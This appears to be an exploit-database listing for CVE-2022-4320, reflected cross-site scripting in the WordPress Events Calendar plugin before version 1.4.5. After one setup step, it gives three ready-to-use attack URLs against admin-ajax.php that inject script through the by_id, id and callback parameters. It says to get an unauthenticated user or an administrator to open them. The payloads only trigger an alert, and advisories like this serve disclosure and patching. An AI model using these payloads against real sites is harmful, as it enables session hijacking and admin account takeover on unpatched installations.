Exploit for WordPress Events Calendar Plugin < 1.4.5 - Multiple Reflected XSS CVE-2022-4320

Name: Exploit for WordPress Events Calendar Plugin < 1.4.5 - Multiple Reflected XSS CVE-2022-4320
Rating: 5 (54 reviews)

2022-12-20 | CVSS -0.1

## https://sploitus.com/exploit?id=WPEX-ID:F1244C57-D886-4A6E-8CDB-18404E8C153C
1. Create a new calendar in the plugin's settings page (most payloads below require at least one calendar to exist)

Attack: Make any unauthenticated or authenticated user (such as an admin) open one of the URLs below:

1. https://exmple.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(`xss`)</script>

2. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX"><script>alert(`xss`);</script>

3. https://example.com/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(`xss`)</script>